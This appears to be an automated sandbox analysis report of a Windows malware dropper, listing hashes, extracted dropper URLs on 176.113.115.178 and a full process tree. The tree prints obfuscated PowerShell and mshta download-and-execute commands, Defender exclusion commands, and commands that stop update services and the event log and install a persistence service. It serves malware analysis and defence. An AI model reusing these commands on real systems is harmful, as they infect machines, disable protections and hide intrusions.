Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    22-11-2024 02:01

General

  • Target

    00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da.exe

  • Size

    50KB

  • MD5

    666248c216a3f63828f739839230f9f6

  • SHA1

    13690837235053762a538b4c5b2b601ec9f6bb22

  • SHA256

    00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da

  • SHA512

    37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde

  • SSDEEP

    768:CT6n3V7i+V39HhHw98cje6O7UgYWE8knmbN8vnoK:7i+/BHw98cyoWE8ks8vnp

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Sets service image path in registry
      • Loads dropped DLL
      PID:476
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch
        2⤵
          PID:592
          • C:\Windows\system32\wbem\wmiprvse.exe
            C:\Windows\system32\wbem\wmiprvse.exe
            3⤵
              PID:1120
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
              3⤵
                PID:1264
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                3⤵
                • Checks processor information in registry
                PID:2632
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                3⤵
                  PID:2196
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k RPCSS
                2⤵
                  PID:668
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                  2⤵
                  • Modifies security service
                  • Indicator Removal: Clear Windows Event Logs
                  PID:752
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                  2⤵
                    PID:808
                    • C:\Windows\system32\Dwm.exe
                      "C:\Windows\system32\Dwm.exe"
                      3⤵
                        PID:1152
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs
                      2⤵
                      • Drops file in Windows directory
                      • Suspicious use of AdjustPrivilegeToken
                      PID:848
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService
                      2⤵
                        PID:964
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkService
                        2⤵
                          PID:112
                        • C:\Windows\System32\spoolsv.exe
                          C:\Windows\System32\spoolsv.exe
                          2⤵
                            PID:1016
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                            2⤵
                              PID:1060
                            • C:\Windows\system32\taskhost.exe
                              "taskhost.exe"
                              2⤵
                                PID:1100
                              • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                2⤵
                                  PID:2012
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                  2⤵
                                    PID:2128
                                  • C:\Windows\system32\sppsvc.exe
                                    C:\Windows\system32\sppsvc.exe
                                    2⤵
                                      PID:1040
                                    • C:\ProgramData\Mig\Mig.exe
                                      C:\ProgramData\Mig\Mig.exe
                                      2⤵
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Drops file in System32 directory
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:280
                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2612
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        3⤵
                                          PID:320
                                          • C:\Windows\system32\wusa.exe
                                            wusa /uninstall /kb:890830 /quiet /norestart
                                            4⤵
                                            • Drops file in Windows directory
                                            PID:2964
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop UsoSvc
                                          3⤵
                                          • Launches sc.exe
                                          PID:2344
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                          3⤵
                                          • Launches sc.exe
                                          PID:1480
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop wuauserv
                                          3⤵
                                          • Launches sc.exe
                                          PID:1996
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop bits
                                          3⤵
                                          • Launches sc.exe
                                          PID:1760
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop dosvc
                                          3⤵
                                          • Launches sc.exe
                                          PID:2240
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                          3⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1212
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                          3⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2784
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                          3⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2788
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                          3⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2848
                                        • C:\Windows\system32\dialer.exe
                                          C:\Windows\system32\dialer.exe
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:748
                                        • C:\Windows\system32\dialer.exe
                                          C:\Windows\system32\dialer.exe
                                          3⤵
                                            PID:2224
                                          • C:\Windows\system32\dialer.exe
                                            dialer.exe
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1468
                                      • C:\Windows\system32\lsass.exe
                                        C:\Windows\system32\lsass.exe
                                        1⤵
                                          PID:492
                                        • C:\Windows\system32\lsm.exe
                                          C:\Windows\system32\lsm.exe
                                          1⤵
                                            PID:500
                                          • C:\Windows\Explorer.EXE
                                            C:\Windows\Explorer.EXE
                                            1⤵
                                              PID:1176
                                              • C:\Users\Admin\AppData\Local\Temp\00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da.exe
                                                "C:\Users\Admin\AppData\Local\Temp\00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da.exe"
                                                2⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:2420
                                                • C:\Windows\system32\wscript.exe
                                                  "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                                                  3⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2488
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                    4⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2472
                                                    • C:\Windows\System32\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                                                      5⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2124
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                                        6⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:804
                                                        • C:\Windows\system32\mshta.exe
                                                          mshta http://176.113.115.178/Windows-Update
                                                          7⤵
                                                          • Blocklisted process makes network request
                                                          • Modifies Internet Explorer settings
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:796
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                            8⤵
                                                            • UAC bypass
                                                            • Blocklisted process makes network request
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:348
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                              9⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1080
                                                            • C:\Users\Admin\AppData\Roaming\LB31.exe
                                                              "C:\Users\Admin\AppData\Roaming\LB31.exe"
                                                              9⤵
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Drops file in System32 directory
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:1916
                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                10⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Drops file in System32 directory
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1248
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                10⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:1520
                                                                • C:\Windows\system32\wusa.exe
                                                                  wusa /uninstall /kb:890830 /quiet /norestart
                                                                  11⤵
                                                                  • Drops file in Windows directory
                                                                  PID:1512
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                                10⤵
                                                                • Launches sc.exe
                                                                PID:3032
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                10⤵
                                                                • Launches sc.exe
                                                                PID:1768
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                10⤵
                                                                • Launches sc.exe
                                                                PID:2572
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe stop bits
                                                                10⤵
                                                                • Launches sc.exe
                                                                PID:2512
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                10⤵
                                                                • Launches sc.exe
                                                                PID:2176
                                                              • C:\Windows\system32\powercfg.exe
                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                10⤵
                                                                • Power Settings
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1088
                                                              • C:\Windows\system32\powercfg.exe
                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                10⤵
                                                                • Power Settings
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2596
                                                              • C:\Windows\system32\powercfg.exe
                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                10⤵
                                                                • Power Settings
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2160
                                                              • C:\Windows\system32\powercfg.exe
                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                10⤵
                                                                • Power Settings
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1652
                                                              • C:\Windows\system32\dialer.exe
                                                                C:\Windows\system32\dialer.exe
                                                                10⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:292
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe delete "LIB"
                                                                10⤵
                                                                • Launches sc.exe
                                                                PID:1568
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                                10⤵
                                                                • Launches sc.exe
                                                                PID:1696
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe stop eventlog
                                                                10⤵
                                                                • Launches sc.exe
                                                                PID:2384
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe start "LIB"
                                                                10⤵
                                                                • Launches sc.exe
                                                                PID:2736
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                    4⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2100
                                                    • C:\Windows\system32\ipconfig.exe
                                                      "C:\Windows\system32\ipconfig.exe" /flushdns
                                                      5⤵
                                                      • Gathers network information
                                                      PID:2960
                                            • C:\Windows\system32\conhost.exe
                                              \??\C:\Windows\system32\conhost.exe "21354429951957220804-4240506541319540706480783522-362915344311064438-1393094908"
                                              1⤵
                                                PID:1500
                                              • C:\Windows\system32\conhost.exe
                                                \??\C:\Windows\system32\conhost.exe "725494791-940305741579456579-1100423391-71079688-195467236418810083111309611015"
                                                1⤵
                                                  PID:1596
                                                • C:\Windows\system32\conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe "-14665177881544605955-1794499894-19370514161676829261890491756556486570626247102"
                                                  1⤵
                                                    PID:1640
                                                  • C:\Windows\system32\conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe "209020220-788319181-10291888471905679389-209344115720245218982020166681-482118747"
                                                    1⤵
                                                      PID:884
                                                    • C:\Windows\system32\conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe "-1399427581358054530-1839017621-1133215727-886420168-985091929-1932248378-1562600042"
                                                      1⤵
                                                        PID:2556
                                                      • C:\Windows\system32\conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe "112673178628996705419856073961404131065-478953759-41541917335974222811080115"
                                                        1⤵
                                                          PID:2648
                                                        • C:\Windows\system32\conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe "-1435518792118120839416341756121244282606270785743890454952360515305-754403420"
                                                          1⤵
                                                            PID:1616
                                                          • C:\Windows\system32\conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe "-1145950790296096820-2049568381621528457-1978877765-79724755-1243444827844115674"
                                                            1⤵
                                                              PID:2032
                                                            • C:\Windows\system32\conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe "-399737336696011868-1860756010-1137470012744109420-13640532281985751226-625436427"
                                                              1⤵
                                                                PID:1788
                                                              • C:\Windows\system32\conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe "640259872-895831503-17031875281056267926-4434919591516829414-1524736864-2046581392"
                                                                1⤵
                                                                  PID:1312
                                                                • C:\Windows\system32\conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe "16259500111348167387-317032975355033327-1739866535-1841407083940828325-27698780"
                                                                  1⤵
                                                                    PID:1964

                                                                  Network

                                                                  MITRE ATT&CK Enterprise v15

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\Users\Admin\AppData\Local\Temp\tempScript.js

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    82f229d0c36b68073da70ef5958e425d

                                                                    SHA1

                                                                    2beb8cd227b49b1d119165d6e3d258ddb730387a

                                                                    SHA256

                                                                    0f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394

                                                                    SHA512

                                                                    4553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970

                                                                  • C:\Users\Admin\AppData\Roaming\CMD.vbs

                                                                    Filesize

                                                                    27KB

                                                                    MD5

                                                                    238ec4d17050e1841e8e0171407c2260

                                                                    SHA1

                                                                    2c8c14b257641f1e1151c6303dabde01621314f2

                                                                    SHA256

                                                                    163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb

                                                                    SHA512

                                                                    3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                    Filesize

                                                                    7KB

                                                                    MD5

                                                                    af9f138d48d78892562d11c2e78169e9

                                                                    SHA1

                                                                    d2b3ae6fe25e7da1d08d9832c71eeeba66e33a29

                                                                    SHA256

                                                                    34046b64d27ace08dda8897bc3fd4d96fb34e323fef0bdfc593085ea114fbdfa

                                                                    SHA512

                                                                    1a78647f596b5c2fac4cb879f6fd5a4e1f14012a82ac40126b0190207bea18d3e141cad27de9f8e5731c0f16ee79baa41999f5386396c2094b3645f457c8bb28

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                    Filesize

                                                                    7KB

                                                                    MD5

                                                                    d8281e3cd58300249fcef2178f91ecbd

                                                                    SHA1

                                                                    5993c0d5a2852f3de38dae960438820d5023fb98

                                                                    SHA256

                                                                    24bf28faecfab779b6275744942a9093cd38b20b366976bab912fa28cd268755

                                                                    SHA512

                                                                    c8d40c3fe4059943be97e72fe0e1421f68184849074a7b7946ec948c84646c783abc829d70584d3c038548b2912c0362ee02e143b708bb85e3c28901cb765bdc

                                                                  • \??\PIPE\srvsvc

                                                                    MD5

                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                    SHA1

                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                    SHA256

                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                    SHA512

                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                  • \Users\Admin\AppData\Roaming\LB31.exe

                                                                    Filesize

                                                                    7.3MB

                                                                    MD5

                                                                    c9e6aa21979d5fc710f1f2e8226d9dfe

                                                                    SHA1

                                                                    d881f97a1fe03f43bed2a9609eae65531cf710cf

                                                                    SHA256

                                                                    a1a8cfcc74f8f96fd09115189defe07ac6fc2e85a9ff3b3ec9c6f454aede1c1d

                                                                    SHA512

                                                                    9e90bcb64b0e1f03e05990cdead076b4c6e0b050932ecb953dae50b7e92b823a80fc66d1fd8753591719e89b405757b2bf7518814bc6a19bb745124d1a691627

                                                                  • memory/280-397-0x000000013F820000-0x000000014031F000-memory.dmp

                                                                    Filesize

                                                                    11.0MB

                                                                  • memory/280-344-0x000000013F820000-0x000000014031F000-memory.dmp

                                                                    Filesize

                                                                    11.0MB

                                                                  • memory/292-54-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/292-52-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/292-55-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/292-57-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/292-59-0x0000000076C00000-0x0000000076D1F000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/292-53-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/292-58-0x0000000076E20000-0x0000000076FC9000-memory.dmp

                                                                    Filesize

                                                                    1.7MB

                                                                  • memory/292-60-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/348-31-0x0000000001E00000-0x0000000001E08000-memory.dmp

                                                                    Filesize

                                                                    32KB

                                                                  • memory/348-43-0x000000013FE70000-0x000000014096F000-memory.dmp

                                                                    Filesize

                                                                    11.0MB

                                                                  • memory/348-30-0x000000001B8E0000-0x000000001BBC2000-memory.dmp

                                                                    Filesize

                                                                    2.9MB

                                                                  • memory/432-63-0x0000000000C90000-0x0000000000CB4000-memory.dmp

                                                                    Filesize

                                                                    144KB

                                                                  • memory/432-67-0x000007FEBEBB0000-0x000007FEBEBC0000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/432-66-0x0000000000CC0000-0x0000000000CEB000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/432-65-0x0000000000C90000-0x0000000000CB4000-memory.dmp

                                                                    Filesize

                                                                    144KB

                                                                  • memory/432-68-0x0000000036E60000-0x0000000036E70000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/476-109-0x0000000000150000-0x000000000017B000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/476-111-0x0000000036E60000-0x0000000036E70000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/476-110-0x000007FEBEBB0000-0x000007FEBEBC0000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/476-343-0x000000013F820000-0x000000014031F000-memory.dmp

                                                                    Filesize

                                                                    11.0MB

                                                                  • memory/476-558-0x000000013F820000-0x000000014031F000-memory.dmp

                                                                    Filesize

                                                                    11.0MB

                                                                  • memory/500-105-0x0000000000300000-0x000000000032B000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/500-113-0x000007FEBEBB0000-0x000007FEBEBC0000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/500-114-0x0000000036E60000-0x0000000036E70000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/592-107-0x0000000036E60000-0x0000000036E70000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/592-100-0x0000000000180000-0x00000000001AB000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/592-106-0x000007FEBEBB0000-0x000007FEBEBC0000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/752-102-0x000007FEBEBB0000-0x000007FEBEBC0000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/752-103-0x0000000036E60000-0x0000000036E70000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/752-101-0x0000000000F30000-0x0000000000F5B000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/1616-326-0x00000000FF9D0000-0x00000000FFA27000-memory.dmp

                                                                    Filesize

                                                                    348KB

                                                                  • memory/1916-45-0x000000013FE70000-0x000000014096F000-memory.dmp

                                                                    Filesize

                                                                    11.0MB

                                                                  • memory/1916-304-0x000000013FE70000-0x000000014096F000-memory.dmp

                                                                    Filesize

                                                                    11.0MB

                                                                  • memory/2100-22-0x000000001BC70000-0x000000001BC8A000-memory.dmp

                                                                    Filesize

                                                                    104KB

                                                                  • memory/2420-10-0x000007FEF51C0000-0x000007FEF5BAC000-memory.dmp

                                                                    Filesize

                                                                    9.9MB

                                                                  • memory/2420-5-0x000007FEF51C0000-0x000007FEF5BAC000-memory.dmp

                                                                    Filesize

                                                                    9.9MB

                                                                  • memory/2420-2-0x00000000001E0000-0x00000000001E6000-memory.dmp

                                                                    Filesize

                                                                    24KB

                                                                  • memory/2420-1-0x0000000000140000-0x0000000000152000-memory.dmp

                                                                    Filesize

                                                                    72KB

                                                                  • memory/2420-0-0x000007FEF51C3000-0x000007FEF51C4000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/2472-12-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

                                                                    Filesize

                                                                    2.9MB

                                                                  • memory/2472-13-0x0000000001F60000-0x0000000001F68000-memory.dmp

                                                                    Filesize

                                                                    32KB